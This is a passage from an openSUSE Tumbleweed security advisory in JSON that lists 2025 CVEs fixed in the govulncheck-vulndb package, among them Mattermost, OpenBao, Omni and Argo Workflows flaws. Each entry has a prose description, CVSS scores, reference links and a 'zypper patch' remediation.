"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.6,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-54470"
},
{
"cve": "CVE-2025-54471",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-54471"
}
],
"notes": [
{
"category": "general",
"text": "NeuVector used a hard-coded cryptographic key embedded in the source \ncode. At compilation time, the key value was replaced with the secret \nkey value and used to encrypt sensitive configurations when NeuVector \nstores the data.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-54471",
"url": "https://www.suse.com/security/cve/CVE-2025-54471"
},
{
"category": "external",
"summary": "SUSE Bug 1249376 for CVE-2025-54471",
"url": "https://bugzilla.suse.com/1249376"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-54471"
},
{
"cve": "CVE-2025-54499",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-54499"
}
],
"notes": [
{
"category": "general",
"text": "Mattermost versions 10.5.x \u003c= 10.5.10, 10.11.x \u003c= 10.11.2 fail to use constant-time comparison for sensitive string comparisons which allows attackers to exploit timing oracles to perform byte-by-byte brute force attacks via response time analysis on Cloud API keys and OAuth client secrets",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-54499",
"url": "https://www.suse.com/security/cve/CVE-2025-54499"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.7,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "low"
}
],
"title": "CVE-2025-54499"
},
{
"cve": "CVE-2025-58073",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-58073"
}
],
"notes": [
{
"category": "general",
"text": "Mattermost versions 10.11.x \u003c= 10.11.1, 10.10.x \u003c= 10.10.2, 10.5.x \u003c= 10.5.10 fail to verify a user has permission to join a Mattermost team using the original invite token which allows any attacked to join any team on a Mattermost server regardless of restrictions via manipulating the OAuth state.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-58073",
"url": "https://www.suse.com/security/cve/CVE-2025-58073"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-58073"
},
{
"cve": "CVE-2025-58075",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-58075"
}
],
"notes": [
{
"category": "general",
"text": "Mattermost versions 10.11.x \u003c= 10.11.1, 10.10.x \u003c= 10.10.2, 10.5.x \u003c= 10.5.10 fail to verify a user has permission to join a Mattermost team using the original invite token which allows any attacked to join any team on a Mattermost server regardless of restrictions via manipulating the RelayState",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-58075",
"url": "https://www.suse.com/security/cve/CVE-2025-58075"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-58075"
},
{
"cve": "CVE-2025-58356",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-58356"
}
],
"notes": [
{
"category": "general",
"text": "Constellation is the first Confidential Kubernetes. The Constellation CVM image uses LUKS2-encrypted volumes for persistent storage. When opening an encrypted storage device, the CVM uses the libcryptsetup function crypt_activate_by_passhrase. If the VM is successful in opening the partition with the disk encryption key, it treats the volume as confidential. However, due to the unsafe handling of null keyslot algorithms in the cryptsetup 2.8.1, it is possible that the opened volume is not encrypted at all. Cryptsetup prior to version 2.8.1 does not report an error when processing LUKS2-formatted disks that use the cipher_null-ecb algorithm in the keyslot encryption field. This vulnerability is fixed in 2.24.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-58356",
"url": "https://www.suse.com/security/cve/CVE-2025-58356"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "not set"
}
],
"title": "CVE-2025-58356"
},
{
"cve": "CVE-2025-59043",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59043"
}
],
"notes": [
{
"category": "general",
"text": "OpenBao is an open source identity-based secrets management system. In OpenBao versions prior to 2.4.1, JSON objects after decoding may use significantly more memory than their serialized version. It is possible to craft a JSON payload to maximize the factor between serialized memory usage and deserialized memory usage, similar to a zip bomb, with factors reaching approximately 35. This can be used to circumvent the max_request_size configuration parameter which is intended to protect against denial of service attacks. The request body is parsed into a map very early in the request handling chain before authentication, which means an unauthenticated attacker can send a specifically crafted JSON object and cause an out-of-memory crash. Additionally, for requests with large numbers of strings, the audit subsystem can consume large quantities of CPU. The vulnerability is fixed in version 2.4.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59043",
"url": "https://www.suse.com/security/cve/CVE-2025-59043"
},
{
"category": "external",
"summary": "SUSE Bug 1252280 for CVE-2025-59043",
"url": "https://bugzilla.suse.com/1252280"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-59043"
},
{
"cve": "CVE-2025-59048",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59048"
}
],
"notes": [
{
"category": "general",
"text": "OpenBao\u0027s AWS Plugin generates AWS access credentials based on IAM policies. Prior to version 0.1.1, the AWS Plugin is vulnerable to cross-account IAM role Impersonation in the AWS auth method. The vulnerability allows an IAM role from an untrusted AWS account to authenticate by impersonating a role with the same name in a trusted account, leading to unauthorized access. This impacts all users of the auth-aws plugin who operate in a multi-account AWS environment where IAM role names may not be unique across accounts. This vulnerability has been patched in version 0.1.1 of the auth-aws plugin. A workaround for this issue involves guaranteeing that IAM role names are unique across all AWS accounts that could potentially interact with your OpenBao environment, and to audit for any duplicate IAM roles.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59048",
"url": "https://www.suse.com/security/cve/CVE-2025-59048"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-59048"
},
{
"cve": "CVE-2025-59530",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59530"
}
],
"notes": [
{
"category": "general",
"text": "quic-go is an implementation of the QUIC protocol in Go. In versions prior to 0.49.0, 0.54.1, and 0.55.0, a misbehaving or malicious server can cause a denial-of-service (DoS) attack on the quic-go client by triggering an assertion failure, leading to a process crash. This requires no authentication and can be exploited during the handshake phase. This was observed in the wild with certain server implementations. quic-go needs to be able to handle misbehaving server implementations, including those that prematurely send a HANDSHAKE_DONE frame. Versions 0.49.0, 0.54.1, and 0.55.0 discard Initial keys when receiving a HANDSHAKE_DONE frame, thereby correctly handling premature HANDSHAKE_DONE frames.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59530",
"url": "https://www.suse.com/security/cve/CVE-2025-59530"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-59530"
},
{
"cve": "CVE-2025-59836",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59836"
}
],
"notes": [
{
"category": "general",
"text": "Omni manages Kubernetes on bare metal, virtual machines, or in a cloud. Prior to 1.1.5 and 1.0.2, there is a nil pointer dereference vulnerability in the Omni Resource Service allows unauthenticated users to cause a server panic and denial of service by sending empty create/update resource requests through the API endpoints. The vulnerability exists in the isSensitiveSpec function which calls grpcomni.CreateResource without checking if the resource\u0027s metadata field is nil. When a resource is created with an empty Metadata field, the CreateResource function attempts to access resource.Metadata.Version causing a segmentation fault. This vulnerability is fixed in 1.1.5 and 1.0.2.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59836",
"url": "https://www.suse.com/security/cve/CVE-2025-59836"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-59836"
},
{
"cve": "CVE-2025-59937",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-59937"
}
],
"notes": [
{
"category": "general",
"text": "go-mail is a comprehensive library for sending mails with Go. In versions 0.7.0 and below, due to incorrect handling of the mail.Address values when a sender- or recipient address is passed to the corresponding MAIL FROM or RCPT TO commands of the SMTP client, there is a possibility of wrong address routing or even ESMTP parameter smuggling. For successful exploitation, it is required that the user\u0027s code allows for arbitrary mail address input (i. e. through a web form or similar). If only static mail addresses are used (i. e. in a config file) and the mail addresses in use do not consist of quoted local parts, this should not affect users. This issue is fixed in version 0.7.1",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-59937",
"url": "https://www.suse.com/security/cve/CVE-2025-59937"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "critical"
}
],
"title": "CVE-2025-59937"
},
{
"cve": "CVE-2025-61141",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-61141"
}
],
"notes": [
{
"category": "general",
"text": "sqls-server/sqls 0.2.28 is vulnerable to command injection in the config command because the openEditor function passes the EDITOR environment variable and config file path to sh -c without sanitization, allowing attackers to execute arbitrary commands.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-61141",
"url": "https://www.suse.com/security/cve/CVE-2025-61141"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-61141"
},
{
"cve": "CVE-2025-61524",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-61524"
}
],
"notes": [
{
"category": "general",
"text": "An issue in the permission verification module and organization/application editing interface in Casdoor v2.26.0 and before, and fixed in v.2.63.0, allows remote authenticated administrators of any organization within the system to bypass the system\u0027s permission verification mechanism by directly concatenating URLs after login",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-61524",
"url": "https://www.suse.com/security/cve/CVE-2025-61524"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-61524"
},
{
"cve": "CVE-2025-61581",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-61581"
}
],
"notes": [
{
"category": "general",
"text": "** UNSUPPORTED WHEN ASSIGNED ** Inefficient Regular Expression Complexity vulnerability in Apache Traffic Control.\n\nThis issue affects Apache Traffic Control: all versions.\n\nPeople with access to the management interface of the Traffic Router component could specify malicious patterns and cause unavailability.\n\nAs this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users.\n\nNOTE: This vulnerability only affects products that are no longer supported by the maintainer.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-61581",
"url": "https://www.suse.com/security/cve/CVE-2025-61581"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-61581"
},
{
"cve": "CVE-2025-61688",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-61688"
}
],
"notes": [
{
"category": "general",
"text": "Omni manages Kubernetes on bare metal, virtual machines, or in a cloud. Prior to 1.1.5 and 1.0.2, Omni might leak sensitive information via an API.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-61688",
"url": "https://www.suse.com/security/cve/CVE-2025-61688"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2025-61688"
},
{
"cve": "CVE-2025-62156",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-62156"
}
],
"notes": [
{
"category": "general",
"text": "Argo Workflows is an open source container-native workflow engine for orchestrating parallel jobs on Kubernetes. Versions prior to 3.6.12 and versions 3.7.0 through 3.7.2 contain a Zip Slip path traversal vulnerability in artifact extraction. During artifact extraction the unpack/untar logic (workflow/executor/executor.go) uses filepath.Join(dest, filepath.Clean(header.Name)) without validating that header.Name stays within the intended extraction directory. A malicious archive entry can supply a traversal or absolute path that, after cleaning, overrides the destination directory and causes files to be written outside the /work/tmp extraction path and into system directories such as /etc inside the container. The vulnerability enables arbitrary file creation or overwrite in system configuration locations (for example /etc/passwd, /etc/hosts, /etc/crontab), which can lead to privilege escalation or persistence within the affected container. Update to 3.6.12 or 3.7.3 to remediate the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-62156",
"url": "https://www.suse.com/security/cve/CVE-2025-62156"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20251105T184115-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-11-07T00:00:00Z",
"details": "important"
